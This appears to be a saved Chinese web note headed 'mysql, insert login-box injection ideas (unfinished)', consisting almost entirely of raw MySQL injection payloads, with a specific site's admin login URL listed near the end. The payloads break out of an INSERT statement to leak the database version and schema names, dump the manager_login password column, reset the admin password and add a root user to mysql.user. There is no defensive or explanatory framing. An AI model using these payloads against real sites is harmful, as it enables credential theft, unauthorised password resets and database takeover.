打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
mysql,insert登陆框注入思路,(未完)
admin','111 or 1=1',1376194991,0,'218.121.111.35',concat(@@version))#

concat((select (select (update manager_login set userPasswd = 111111 where userName = admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x

update manager_login set userPasswd = '111111' where userName = 'admin'

admin',1,1376194991,0,'218.121.111.35',concat((select (select (SELECT distinct concat(0x7e,0x27,userPasswd,0x27,0x7e) FROM manager_login))))#

concat((select (select (select distinct concat(@@version)))))
update manager_login set userPasswd = 111111 where userName = admin

concat((select (select (select concat(@@version)))))
concat((select (select (select database()))))

insert into mysql.user (user,password) values ('root',111111)
concat((select (select (insert into mysql.user (user,password) values ('root',111111)))))

concat((select (select (SELECT distinct concat(0x7e,0x27,userPasswd,0x27,0x7e) FROM manager_login))))
SELECT distinct concat(0x7e,0x27,userPasswd,0x27,0x7e) FROM manager_login

最抢眼
admin',1,1376194991,0,'218.121.111.35',concat((select (select (SELECT distinct group_concat(schema_name) from information_schema.schemata)))))#
group_concat(schema_name),3,4 from information_schema.schemata

http://i.28.com/manager/index.php?do=1
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
WEB常见漏洞之SQL注入(靶场篇—2)
网站安全之SQL盲注渗透测试方法经验分享
最简单的注入
SQL手工注入总结 必须收藏
Web安全之SQL注入(原理,绕过,防御)
MySQL注入--Payload
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服